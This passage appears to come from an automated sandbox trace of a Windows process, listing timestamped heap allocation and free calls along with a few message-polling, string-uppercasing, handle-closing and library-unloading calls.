dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.832] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0257.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0257.832] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0257.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.833] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0257.833] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.834] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.834] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.834] FreeLibrary (hLibModule=0x74d40000) returned 1 [0257.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.835] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.835] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.835] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0257.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.836] CloseHandle (hObject=0x2a0) returned 1 [0257.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0257.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0257.839] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0257.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.840] CloseHandle (hObject=0x268) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0257.843] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0257.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0257.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 